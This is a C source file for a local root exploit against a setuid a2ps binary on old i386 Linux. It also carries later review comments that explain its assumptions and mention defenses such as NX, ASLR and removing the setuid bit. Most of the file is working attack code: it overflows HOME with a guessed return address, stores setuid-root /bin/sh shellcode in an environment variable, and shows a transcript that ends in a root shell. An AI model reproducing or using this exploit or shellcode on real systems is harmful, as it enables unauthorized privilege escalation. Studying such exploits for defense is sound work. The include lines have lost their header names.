/*
 * /usr/bin/a2ps exploit by lizard / lizstyle[at]gmail[dot]com
 * NOT suid by default =\ (the transcript below shows the bit set by hand)
 *
 * [lizard@testbox lizard]$ ls -alF `which a2ps`
 * -rwsr-sr-x 1 root root 324408 Aug 5 2002 /usr/bin/a2ps*
 * [lizard@testbox lizard]$ gcc -O3 -o a2ps a2ps.c
 * [lizard@testbox lizard]$ id
 * uid=500(lizard) gid=500(lizard) groups=500(lizard)
 * [lizard@testbox lizard]$ ./a2ps
 * [*] 0xbfffffce
 * sh-2.05b# id
 * uid=0(root) gid=500(lizard) groups=500(lizard)
 * sh-2.05b# uname -a
 * Linux testbox 2.4.18-14 #1 Wed Sep 4 12:13:11 EDT 2002 i686 athlon i386 GNU/Linux
 * sh-2.05b#
 *
 * thanks go to slider,trog
 *
 * NOTE(review): every assumption here is tied to a 2002-era i386 Linux 2.4
 * box -- a fixed stack top (0xbffffffa, no ASLR), an executable stack that
 * runs code placed in an environment string, no stack-protector, and an
 * a2ps binary that someone has marked setuid root even though the package
 * does not ship it that way.  Defensively: never grant a2ps the setuid bit,
 * audit for unexpected setuid files, and NX/ASLR/stack canaries on a modern
 * build remove each of the assumptions below.
 */

/* NOTE(review): the three header names were lost in page extraction.
 * The code below uses fprintf, perror, exit, setenv, execl and strlen. */
#include
#include
#include

#define A2PS "/usr/bin/a2ps"
/* Unparenthesized macro: "(long) DEFRET" casts only the 0xbffffffa literal,
 * and the two strlen() results then promote the whole expression to
 * size_t/unsigned arithmetic.  The value is a hard-coded guess at where the
 * environment strings sit just below the stack top -- presumably where a2ps
 * keeps the oversized HOME copy; only the transcript's "0xbfffffce" supports
 * that, so treat it as an assumption. */
#define DEFRET 0xbffffffa - strlen(sc) - strlen(A2PS)
/* Length of the padded HOME value (bytes, including the terminator). */
#define xnullbitch 1100

//shellcode by man shadow
//setuid(0) and exec /bin/sh shellcode
/* Placed verbatim into the TOPX environment variable below; its bytes are
 * the reason an executable stack is required for this to work. */
char sc[] =
    "\x31\xC9"             /* xor ecx,ecx */
    "\x31\xDB"             /* xor ebx,ebx */
    "\x6A\x46"             /* push byte 70 */
    "\x58"                 /* pop eax */
    "\xCD\x80"             /* int 80h */
    "\x51"                 /* push ecx */
    "\x68\x2F\x2F\x73\x68" /* push 0x68732F2F */
    "\x68\x2F\x62\x69\x6E" /* push 0x6E69622F */
    "\x89\xE3"             /* mov ebx,esp */
    "\x51"                 /* push ecx */
    "\x53"                 /* push ebx */
    "\x89\xE1"             /* mov ecx,esp */
    "\x99"                 /* cdq */
    "\xB0\x0B"             /* mov al,11 */
    "\xCD\x80";            /* int 80h */

/*
 * Builds an oversized HOME value, exports the payload as TOPX, and execs
 * the (assumed setuid) a2ps binary.  Returns 0 only in theory: on any
 * failure the process exits with status 1, and a successful execl() never
 * returns, so the final return is effectively unreachable.
 */
int main(void)
{
    int ctr = 0;
    char buffer[xnullbitch];

    /* "%8x" expects an unsigned int but receives a long: harmless on ILP32
     * (the target of this code), a format mismatch on LP64. */
    fprintf(stdout, "[*] 0x%8x\n", (long) DEFRET);

    /* Fill the buffer with repeated copies of DEFRET at 4-byte steps.  This
     * relies on sizeof(long) == 4: the last store at offset 1096 then ends
     * exactly at index 1099, which is overwritten by the terminator next.
     * With an 8-byte long the store runs past the end of buffer.  The cast
     * also performs unaligned long stores through a char array, which x86
     * tolerates but the C standard does not guarantee. */
    for(ctr = 0; ctr < xnullbitch - 1; ctr += 4)
        *(long *) &buffer[ctr] = (long) DEFRET;
    buffer[xnullbitch - 1] = '\0';

    /* HOME is the variable a2ps is presumed to copy without a bound check;
     * nothing on this page shows the a2ps side, so that is inferred. */
    if((setenv("HOME", buffer, 1)) == -1) {
        perror("setenv()");
        exit(1);
    }

    /* The payload rides along in an unrelated environment variable so it
     * lands on the new process's stack. */
    if((setenv("TOPX", sc, 1)) == -1) {
        perror("setenv()");
        exit(1);
    }

    /* execl() only ever returns -1, so the comparison is redundant.  POSIX
     * also wants the sentinel written as (char *)NULL for a variadic call. */
    if((execl(A2PS, A2PS, NULL)) == -1) {
        perror("execl()");
        exit(1);
    }

    return(0);
}